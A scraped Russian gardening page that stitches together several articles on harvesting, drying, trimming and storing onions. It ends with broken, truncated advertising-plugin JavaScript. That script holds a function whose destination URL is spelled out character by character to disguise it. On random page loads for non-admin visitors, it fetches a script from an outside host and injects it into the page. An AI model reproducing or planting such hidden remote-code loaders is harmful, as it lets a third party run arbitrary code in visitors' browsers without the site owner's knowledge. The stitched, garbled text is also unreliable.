99 просмотров
Рейтинг статьи
1 звезда 2 звезды 3 звезды 4 звезды 5 звезд
Загрузка...

Когда обрезать лук

Как обрезать лук правильно и как делаем мы?

В конце июля – августе наступает пора уборки лука. Его вынимают из земли, просушивают, обрезают перо и корни. Опытные дачники делают все на автомате, а вот новичкам бывает сложно сориентироваться в огородных премудростях. А сложности, они ведь в мелочах: когда обрезать лук и как, сколько сантиметров пера оставлять, насколько глубоко срезать корни. И в этой статье разберем вопрос обрезки лука репчатого перед закладкой на хранение – во всех мелочах и подробностях. Чтобы вопросов больше не возникало. Поехали!

Обрезка лука по всем правилам

Для начала заглянем в периодические издания и выясним, что пишут по теме агрономы.

В журнале «Моя грядка изобилия», который мы любим и уважаем, рекомендуют делать так:

  • Приступать к уборке лука лучше всего ранним погожим утром. Вынуть луковицы из земли, аккуратно подкопнув их лопатой или вилами, после чего разложить на грядке рядами и дать обсохнуть в течение дня на солнце.
  • Ближе к вечеру лук следует перенести на веранду домабани или чердак. Главное, чтобы помещение было сухим и проветриваемым. В течение 2-3 недель лук должен лежать и сохнуть вместе с корнями и пером. Другой вариант: подвесить лук, перегнув верхушку шейки (также не обрезая).
  • После того как перо пожелтеет и высохнет, приступают к обрезке. В источнике написано, что перо обрезается на расстоянии 3-5 см от шейки.
  • Хранят лук в сухом проветриваемом помещении при комнатной температуре.

В другом источнике (книга «Лук и чеснок на приусадебном участке») пишут:

  • После того, как лук вынули из земли, его необходимо просушить. Если погода стоит сухая и солнечная, лук раскладывают рядами прямо на грядке (корни в одну сторону, листья в другую). Так сушат лук в течение недели, но время от времени его нужно ворошить. Солнышко дозарит луковицы и обеззаразит их, в результате чего лук будет лучше храниться. Если выпадают росы, на ночь лук укрывают. В дождливую погоду лук вместе с пером сушат под навесом.
  • У просохшего, готового к хранению лука, шейка становится тонкой и сухой, чешуи также высыхают и обретают золотистый оттенок. Лук готов к обрезке.
  • При обрезке пера оставляют шейку не короче 5-6 см, — гласит источник. Про корешки также ничего не сказано.

Журнал «Приусадебное хозяйство», который в нашей семье читают с 70-х годов прошлого века, советует:

  • Убирать лук в сухую и солнечную погоду, чтобы в течение недели дать просохнуть ему на свежем воздухе прямо на грядке.
  • Сохнущий на грядке лук накрывать от дождя и росы.
  • Подсохшие луковицы очищают, сортируют.
  • Луковую шейку обрезают до 3-5 сантиметров.
  • Идеальное место для хранения лука — в сухом подвале, в ящиках, поставленных штабелями друг на друга.
  • Лук хорошо кранится и в комнатных условиях, в темном месте в коробке, корзине или косах. Оптимальная температура: 18-20 градусов тепла.

Личный опыт: Как мы обрезаем лук

Обе наши бабушки убирают лук в начале августа, чаще всего он созревает к этому сроку. Погода нас не балует, поэтому процесс сушки и обрезки происходит иначе, чем написано в источниках. Выходит, мы нарушаем правила, но лук при этом хорошо хранится. Итак, вот как убираем и обрезаем лук мы.

Опыт бабы Тани

Лук вынимаем из земли и раскладываем сохнуть на грядке в течение дня . Всегда стараемся выбрать для уборки солнечный погожий день, поэтому внимательно следим за прогнозом, когда лук уже «на подходе».

Луковое перо бабушка обрезает сразу, вечером в этот же день . А это ну совсем не по правилам. По всем канонам, лук должен сначала сохнуть вместе с пером, чтобы дозреть (срок от 1 до 3 недель). Но в этом плане бабушка не привыкла заморачиваться. Порядок такой:

  • Вынула из земли, обсушила день на солнце, вечером обрезала, разложила по ящикам в один-два слоя.

Так, прямо в ящиках, обрезанный лук сушится на веранде дней 5, если погода дождливая. В солнечную погоду баба Таня выносит ящики на солнце. Лук просушивается очень замечательно. Главное — луковки должны быть разложены в ящике тонким слоем, поэтому их понадобится несколько.

Через 5 дней бабушка относит ящики на чердак. На сухом проветриваемом чердаке обрезанный лук сушится до холодов, после чего отправляется на зимнее хранение в домашних условиях. Хранит баба Таня лук в квартире, в картонных коробоках, пластиковых ящиках с дырочками и овощных сетках.

Выходит, на практике мы действуем вне всяких правил. А виновата во всем погода. В нашем регионе дожди идут часто, поэтому сушить лук на грядке целую неделю нет возможности. Итак, обрезаем сразу!

А обрезает лук баба Таня следующим образом:

  • Берет ножик и отсекает перо на расстоянии примерно 3-5 см от луковицы.

  • Корешки также обрезает ножом. Но не подчистую, а только бОльшую часть, следующим образом:

  • Пару слов об очистке шелухи (чешуи). Если лето было солнечным и сухим, «догола» луковицу обдирать не надо. Когда мы вместе обрезаем лук, мама всегда говорит: очищай то, что легко отходит. Но нынче лето дождливое, чешуи у многих луковиц стали склизкими, поэтому их снимаем аккуратно ножом почти дочиста:

Опыт бабы Люси

Бабушка Людмила Михайловна убирает лук в несколько этапов, поскольку это очень трудоемкий процесс. К уборке приступает всегда в начале августа.

Вынимает лук из земли в первой половине дня. И хорошо, если лук вместе с пером в этот же день успеет полежать на солнышке и просохнуть. А если идет дождь — бабушка уносит урожай в теплицу или на веранду, пока дождь не прекратится.

В любом случае перо баба Люся старается обрезать в тот же день. Причина, опять же, непогода, которая не дает сушить лук на открытом воздухе. А во-вторых, нет помещения на даче, где можно было бы расположить лук на 2-3 недели. Вместе с необрезанным пером лук занимает очень много места.

Баба Люся обрезает лук , оставляя «хвостики» длиной 4-5 см.

А донце после обрезки выглядит так:

А вот так уже выглядит лук на хранении:

Хвостики высыхают и уменьшаются в размерах, а место среза корней затягивается.

Если лето было мокрым…

В дождливое лето лук чересчур напитывается влагой, создаются предпосылки для развития гнили. Такая ситуация актуальна этим летом. Вынув лук из земли, баба Люся заметила на чешуйках очаги гнили, поэтому очищала лук более тщательно, чем обычно. Видите, верхние чешуйки сняты, лук оголен добела. Это не самый лучший вариант. В хороший год так делатть не надо. Но если дето дождливое и лук начинает загнивать, лучше подстраховаться и очистить лук побольше.

Сушка

Обрезанный лук бабушка сортирует (на еду, консервацию и долгое хранение) и тонким слоем раскладывает по ящикам:

Ящики уносим на веранду и ставим штабелями — друг на друга. В солнечную погоду нужно обязательно выносить ящики на улицу.

В ящиках лук лежит у бабушки до холодов, а потом мы переносим их в дом, к печке.

Лук сушат, пока шуршать не начнет. А затем можно убирать его на зимнее хранение. У нас лук хранится отлично, значит — все делаем правильно.

Зачем обрезать лук, и как правильно это сделать для хранения на зиму

После сбора урожая лука важно правильно подготовить его к длительному хранению. Один из обязательных этапов — обрезка перьев. Процедура позволяет сохранить овощи свежими практически до самой весны, защищает их от гнили.

Как понять, что лук созрел

Лук полностью созревает в первой половине августа, но сроки незначительно различаются в зависимости от региона и климатических условий. Для длительного хранения урожая важно не допускать перезревания овощей или выкапывать их преждевременно.

Ориентировочное время сбора овощей — около 80 дней с даты посадки, если был посажен не ранний сорт.

Если шелуха еще не успела полностью сформироваться, луковицы быстро начнут гнить даже при подходящих температуре и влажности. На поздно собранных овощах сухие чешуи практически не держатся, быстро осыпаются, прорастают корни. У перезревших экземпляров появляется излишняя водянистость, теряется острота и насыщенность вкуса. Такой лук лучше сразу употребить или применить для консервации, но не оставлять на хранение.

Признаки

Главный признак созревших овощей — высохшая и пожелтевшая ботва. Она ослабевает и полностью опускается на землю. Ко времени сбора луковицы максимально насыщаются полезными веществами.

Справка! Ориентироваться на пожелтевшую и полегшую ботву не всегда правильно: при дождливом и прохладном лете перья не опускаются.

Достоверные внешние признаки созревания луковиц:

  • истончающаяся и подсыхающая шейка;
  • часть сухих чешуй, проглядывающих из земли, не шелушится и выглядит сухой.

Если до запланированной уборки ботва не пожелтела, ее сразу не обрезают. Луковицы оставляют на 15–20 дней под навесом: за это время перья подсыхают, а все питательные вещества уходят в репки.

Как правильно убирать лук

Для сбора урожая выбирают сухой солнечный день. За 10–14 дней поливы прекращают, чтобы увеличить лежкость овощей. При затяжных дождях участок прикрывают непромокаемым материалом, чтобы лук долго не сушить.

Кстати! На торфяной или песчаной почве репки выдергиваются легко, а на плотном суглинистом грунте часто остаются без донцев и быстро гниют.

Лук собирают с утра, вытаскивают из земли, оставляют на грядке ровными рядами для предварительной просушки. Вечером переносят в сарай или другое помещение с хорошей вентиляцией на 2-3 суток. После этого с овощей убирают остатки почвы, срезают корневую часть до самых донцев.

Качественная просушка — залог длительного хранения. Если оставить луковицы влажными, на них быстро распространится плесень и спровоцирует гниение.

Для чего обрезают лук

Обрезка полезна с практической точки зрения: без высохших перьев овощи занимают меньше места, выглядят аккуратнее, более привлекательны для покупателей. Оставшиеся перья часто начинают гнить — грибок передается на репки, в результате урожай быстро пропадает.

При обрезке важно не повредить ботву, иначе в саму луковицу попадут бактерии. Некоторые огородники оставляют перья, чтобы заплетать «косички» для длительного зимнего хранения.

Подготовка и обрезка

После сбора с грядки и сушки все овощи внимательно осматривают, сортируют. Пораженные экземпляры выбрасывают или употребляют в первую очередь. Для хранения они не подходят.

Как правильно обрезать лук

Для хранения на зиму перья удаляют таким образом, чтобы не повреждалась шелуха у репки. Если ботва сухая и хорошо тянется, ее обрывают вручную, оставив ножку не более 5 см длиной. Если у луковицы крупная толстая шейка, у основания оставляют около 8–10 см, но такие экземпляры портятся раньше всех. Для хранения урожая в «косичках» шейку оставляют до 15 см.

Важно! Если лук убирают больше, чем на 3 месяца, место среза обрабатывают известковой пастой. Это уменьшит риск гнили или прорастания.

Как обрезать севок

Посадочный материал не употребляют, а хранят до следующего сезона, чтобы вырастить полноценные репки. Несколько отличаются от обычных уборка и хранение лука-севка, обрезка тоже становится более трудоемкой из-за размера овощей.

Срезают перья сразу после того, как севок извлечен из почвы. Корневую часть не удаляют, а только очищают от остатков грунта. Ботву срезают на 10 см от основания. Во время обрезки сразу проводят и отбраковку, убирая из общей массы поврежденные экземпляры.

Когда не стоит обрезать

Иногда обрезка лука абсолютно бесполезна. Так, некоторые дачники используют сухую ботву для связки вместо веревки. Из общей массы урожая убирают подгнившие или поврежденные экземпляры, чтобы предотвратить порчу остальных. Предварительно овощи раскладывают под открытым солнцем на участке на 10–12 часов.

Как правильно сушить

Сушка репки и севка предотвращает их поражение гнилью. В сухую погоду урожай раскладывают на открытых грядках, фанерных листах или досках, а при дожде — в хорошо вентилируемом помещении, на мешковине или слое бумаги. Под солнечными лучами овощи держат 10–15 суток.

Репчатый лук хранят и в косах, если нет возможности разложить его слоями. Подвешивают его в сухих проветриваемых помещениях (в сарае, на веранде, чердаке). После полного высыхания косы еще раз перевязывают, удаляя поврежденные экземпляры.

Хранение зимой

Выбор места для репчатого лука определяют с учетом возможностей и объема урожая. Владельцам частных домов или гаражей гораздо проще решить эту проблему, чем собственникам квартир.

Главные условия:

  • чистота помещения и выбранной тары;
  • температура — в пределах 0°C;
  • влажность воздуха — 65—75%;
  • регулярное проветривание и хорошая вентиляция.

Допускается хранение лука при температуре -2…-3°C, но без колебаний. В таких условиях овощи пригодны для употребления 8–10 месяцев.

Где и как хранить

Удобно держать лук в погребе или подвале. Делают это несколькими способами:

  • навалом (одной насыпью высотой до 3 м на поддонах из досок или на полках с отверстиями для вентиляции);
  • в деревянных ящиках, накрытых мешками или одеялами;
  • в сетке и мешках;
  • в виде вязанок.

Если в помещении плохая теплоизоляция, то при сильных морозах урожай накрывают одеялами и соломой. Главное, чтобы материал пропускал воздух.

В домашних условиях

В квартирах гораздо меньше условий для размещения урожая. Один из вариантов хранения — холодильник, но в нем овощи сохраняют свежесть и вкус только до 1,5 месяцев. Оптимальное место — нижние полки или ящики для овощей. Луковицы не завязывают плотно в полиэтиленовые пакеты, иначе образуется конденсат. Достаточно разложить их насыпью или в бумажные пакеты.

Важно! На верхних полках холодильника лук быстро гниет, появляется специфический запах.

На балконах с утеплением, где температура не превышает +7°C и не опускается ниже 0°C, овощи раскладывают в ящики или миски. Не размещают такие емкости рядом с картофелем: он активно выделяет влагу, что приводит к быстрой порче урожая.

Заключение

Лук, выращенный за сезон, успешно сохраняет товарный вид и вкус в течение всего осенне-весеннего периода. Важно правильно собрать овощи с грядки, качественно просушить и обрезать, чтобы защитить от гниения, потери вкусовых и питательных качеств. Удаление перьев продлевает срок хранения урожая и обеспечивает семью полезным продуктом до следующего сезона.

Как правильно обрезать лук на хранение после сбора урожая

Время на чтение: 4 минуты

Чтобы сохранить урожай лука как можно дольше и в наилучшем состоянии, его после выкопки нужно обработать – высушить и обрезать. Технология этих работ не сложна, но имеет свои нюансы: если знать, как обрезать лук на хранение правильно, к весне он сохранит не только привлекательный внешний вид, но и большую часть полезных витаминов, микроэлементов.

Обрезка лука – зачем это нужно?

После сбора урожая выкопанные луковицы 4-5 дней (и дольше, если это необходимо) просушивают на солнце или на сквозняке в тени, после чего готовят к длительному хранению – обрезают корни и высохшую ботву.

Цель этой процедуры, следующая:

  • оставшиеся перья не станут причиной развития гнилостных болезней;
  • лук не будет преждевременно выпускать стрелки;
  • ботва не помешает, не займет место в таре для хранения.

Если луковицы предполагается хранить недолго, обрезка ботвы не нужна: удаляют только корешки, а головки заплетают с помощью высохших перьев в косы, после чего подвешивают в сухом прохладном месте.

Когда обрезают лук после выкопки из земли?

Лук-репку стараются выкапывать, предварительно ознакомившись с прогнозом погоды: если есть возможность, то выкопанный овощ сразу подсушивают на солнце прямо на грядках несколько часов, иногда переворачивая. Ультрафиолетовые лучи дезинфицируют урожай, убивая болезнетворные бактерии.

Затем переносят лук и досушивают под навесом или в доме, обеспечив приток свежего сухого воздуха. Ботва за это время успевает подвянуть, а головки – еще чуть-чуть подрасти. Слишком долго на солнце находиться луку нежелательно – может появиться прозелень на сочных чешуях.

У готовых к обрезке луковиц полностью сухие корни и чешуйки. Чтобы убедиться в этом, в ворох головок нужно попытаться просунуть руку. Если она входит легко, а луковицы шелестят, можно начинать работу. В непросохший, сырой лук рука не войдет.

Если овощ выращивался на грунтах, щедро удобренных азотом, одного просушивания перед обрезкой мало. Для профилактики развития шейковой гнили, ложной мучнистой росы, развивающихся в период хранения, его дополнительно сушат еще 5-6 дней при температуре 32-34°C или 8 часов при температуре 42-43°C.

Лук-севок, выращенный из чернушки, также просушивают после уборки, которую проводят несколько позже, чем для лука репчатого. К этому моменту луковички должны не только сформироваться полностью, но иметь одну кроющую чешую. Когда после просушки они будут покрыты несколькими кроющими чешуйками, засохшую зелень можно отрезать.

Подготовка и обрезка лука на хранение

Хорошо просушенный лук перебирают, отделяя подпорченные и те, у которых шейка плотная, не сухая. Перо у таких головок обрезают на высоте 10 см от основания и используют их для приготовления пищи в первую очередь.

У остальных острым ножом, ножницами или секатором срезают высохшую ботву иначе. Для разных видов лука правильно делать это следующим образом:

  • у репчатого, предназначенного для долгого зимнего хранения, – удаляют корни, не затрагивая донце, сухую ботву, оставляя шейку выше плечиков на 4-6 см. Если обрезать перо слишком низко, почти вровень с плечиками, то это спровоцирует быструю порчу урожая;
  • у севка перо срезают почти полностью, оставляя кончик длиной около сантиметра, а корни оставляют, стараясь не повредить при дальнейшем хранении.

Когда не стоит проводить процедуру

Если репчатый лук не планируют хранить длительно, до весны, а собираются использовать для еды в ближайшее время, его традиционно заплетают косами. В таком случае ботва нужна для их формирования. Предварительно убирают подгнившие или подпорченные перья, чтобы они не стали источником распространения какой-либо инфекции. Перед плетением лук-репку стандартным образом просушивают.

Лук-севок обрезают всегда и хранят хорошо просушенным насыпом в коробках или в несколько слоев разложенным на плоской поверхности.

Ошибки начинающих садоводов

Несмотря на простоту процедуры обрезки лука, овощеводы порой допускают ошибки в ее технологии:

  • не обрезают, а обрывают высохшую ботву;
  • обрезают перо слишком рано, не дав луковицам, снятым с грядки, подсохнуть;
  • при обрезке корней травмируют донце головок.

Все эти погрешности способствуют проникновению инфекций внутрь луковиц и быстрой порче урожая.

Правильное же проведение обрезки и дальнейшее хранение хорошо просушенного материала с соблюдением правильных условий (при домашнем хранении – при температуре +18+22°C с относительной влажностью воздуха 60-70 %) поздние сорта долежат до апреля-мая.

Как правильно обрезать лук для хранения на зиму после сбора урожая

Каждому овощу – свое время: если редис начинают собирать уже в июне, кабачки в июле, а картофель в сентябре, то для репчатого лука идеальная пора – начало и середина августа. Когда наступает время уборки овощей с грядок, неопытные садоводы задаются вопросом, как правильно обрезать лук для хранения на зиму, чтобы луковицы были свежими и упругими до следующей весны.

Как правильно собрать лук для хранения зимой

Для начала необходимо установить, готовы ли луковицы к сбору. Основные признаки – ботва жухнет и ложится на землю, шейки слегка подсохли. Можно приступать к работе:

  1. Выбрать теплый солнечный день, с утра вытащить луковицы из земли разложить рядами прямо на грядке для просыхания.
  2. Вечером того же дня убрать овощ под навес или в сарай, оставить на 2-3 дня.
  3. С подсушенных луковиц счищают землю, обрезают корни до самого донца.
  4. Обрезать перья, оставляя “хвостики” не меньше 10 см. Если планируется хранить лук в виде косы или венка, срезать перышки не надо.

Сушка лука на грядке

Хорошее просушивание – самое главное условие благополучного хранения. Если овощи останутся хотя бы немного влажными, по ним легко распространится плесень, начнется гниение. Поэтому планировать извлечение луковиц из грядок желательно на сухое и жаркое утро. Просушив плоды на грядках в течение дня, необходимо их убрать в помещение или под навес. Там овощи раскладываются по полу на слой песка или по стеллажам и сушатся еще двое суток. Время от времени овощи необходимо ворошить, чтобы они просохли равномерно.

Надо ли обрезать лук

Обрезка овоща для заготовки на зиму имеет чисто практический смысл: без перьев урожай можно уложить компактнее, да и смотрится он аккуратнее. Некоторые садоводы считают, что в первые несколько дней после выдергивания из грядки витамины из ботвы переходят внутрь луковицы. Скорее всего, это легенда: по правилам обрезки, перо срезают уже у подсушенной репки, чтобы свежий срез не стал входными воротами для бактерий. Для декоративных луковых кос ботву у овоща оставляют.

Обрезка лука на хранение

Способ подойдёт не только для заготовки на зиму репчатого лука, но и тем, кто желает сохранить лук-порей. Правильно обрезать лук на хранение нужно так:

  1. Высушенные и очищенные от остатков земли луковицы освободить от корней. Для этого острым ножом на небольшом расстоянии от донца луковицы обрезают корешки. Важно не задеть сам плод.
  2. Бритвой или ножом (можно использовать ножницы) обрезать ботву луковиц, чтобы осталась шейка длиной 5-10 см.
  3. Для лука-порея обрезать верхушки листов так, чтобы зелёная часть составляла 10-15 см.

Хранение лука зимой в домашних условиях

Овощ может пролежать при комнатной температуре до весны, оставаясь свежим, если обеспечить ему правильные условия хранения. Кроме полного высыхания, нужна хорошая вентиляция. Плоды убирают в картонные коробки, мешки из хлопчатобумажной ткани, подвешивают в сетках. Распространенный домашний вариант овощной сетки – женские колготки, их удобно набивать луковицами и подвешивать в кладовке или погребе.

Где и как хранить лук дома

Можно разнообразить интерьер, сплетя луковую косу. Максимально декоративной она получится при сочетании разных видов овоща – красного, белого, желтого. Можно вплести пластиковые муляжи овощей и ягод. Большие объемы, однако, удобнее хранить в мешках и коробках. Помещение должно быть в меру просторным и прохладным. Подойдет сухой погреб, в условиях квартиры – хорошо утепленный балкон.

Температура хранения

При хранении плоды способны выдерживать диапазон от 0 до 22°С, оптимально поддерживать в помещении 18°С. Некоторые сорта (острые и подострые) могут пережить небольшие заморозки (1-2°С ниже нуля), не потеряв вкусовых качеств. При более высокой температуре луковицы ссыхаются, при низкой – замерзают. При невозможности обеспечить правильные условия для овоща, лучше заготовить его на зиму другим способом: порезать и засушить или замариновать. От неправильного хранения легко потерять урожай.

Видео

Нашли в тексте ошибку? Выделите её, нажмите Ctrl + Enter и мы всё исправим!

3 способа обрезки лука перед посадкой на перо. Ч. 1

Выращивать зеленый лук выгодно, так как культура скороспелая, а урожайность высокая. В статье пойдет речь о подготовке луковиц для выгонки на перо. Разберемся, влияет ли это на скорость появление первого листа, количество и высоту зелени. Рассмотрит 3 способа, и выберем оптимальный.

Немного биологии, чтобы понимать как выращивать лук

Лук репчатый ‑ двулетнее растение. Корни живут только один год, отмирают после завершения вегетации. Чешуи – это видоизмененные листья. Стебель у лука не такой, какой мы привыкли видеть у других культур. Он укорочен и приплюснут, называется донцем. На нем закладываются почки (зачатки). От их количества луковицу относят к одно-, двух-, или многозачатковой. Последняя самая урожайная для выгонки на перо. Каждая почка дает старт ложному стеблю и трубчатым зеленым листьям из него.

Зачем обрезать луковицу?

Удаление верхушки луковицы облегчает доступ кислорода. В клетках активизируются обменные процессы, дыхание, гидролиз сахаров. Прекращение периода покоя ускоряет выгонку. Особенно это важно при круглогодичном выращивании в теплице. Луковицы, которые закончили период покоя одновременно, дают дружный рост и качественный урожай. Кроме того убирается преграда, и листочкам легче выглянуть на поверхность.

3 способа подготовки луковиц к посадке:

  • Надрез верхней части по плечики. Самый распространенный и простой. Подходит для небольших луковиц.
  • Обрезка на 1/3 верхней части. Чаще применяется для крупных луковиц.
  • Разрезание луковицы вдоль на две части.

Сравниваем эффективность разных методов

Влияние способа подготовки луковиц к посадке на урожайность и ряд других показателей изучено учеными: Тутова Т.Н., Дурова А.В. Швецов А.М. Рассмотрим результаты трехкратного опыта на примере выгонки лука на перо в защищенном грунте.

Каждую из трех групп луковиц обрезали одним из вариантов и высадили в грунт мостовым способом. Четвертая группа ‑ луковицы без обрезки, чтобы сравнить результаты с контролем. Наблюдения велись по показателям: появление первых листьев, прорастание третьего листа, длина самого высокого листа и количество листьев, длина ложного стебля, размер луковицы, количество ложных стеблей и листьев в нем, время уборки, объем урожая. Немаловажное значение для оценки качества продукции имеет накопление нитратов и концентрация сухого вещества и витамина C.

Влияет ли обрезка на количество и длину листьев?

При разрезании одностебельной и двустебельной луковицы наполовину резко снижается количество листьев – на 2 шт., при сравнении с контролем. Обрезка на 1/3 одностебельной луковицы может уменьшать количество листьев, но не существенно (в среднем на 0,4 шт.). Эта же процедура для двустебельной луковицы оказывается положительной, количество листьев увеличивается на 0,8 шт. Надрез по плечики не влияет на количество листьев. Длина листьев, которые выросли с обрезанных и необрезанных луковиц не отличается и составляет от 26 до 29 см.

Урожайность

Полное разрезание луковицы приводит к снижению урожайности на 12 кг с 1 м кв. Результаты в среднем за 2 года: масса зеленого пера с одной луковицы, которое получили без обрезки – 74,2 г, надрез – 80 г, обрезка на 1/3 – 85 г, разрез наполовину ‑ 56,2 г. Надрез луковицы и обрезка на 1/3 не дает существенных изменений урожайности по сравнению с высаженным без обрезки посадочным материалом. Но обрезать все же нужно. Об этом во второй части статьи.

Во второй части ‑ влияние обрезки на качество продукции, накопление нитратов. А также рекомендации по подготовке луковиц к посадке.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};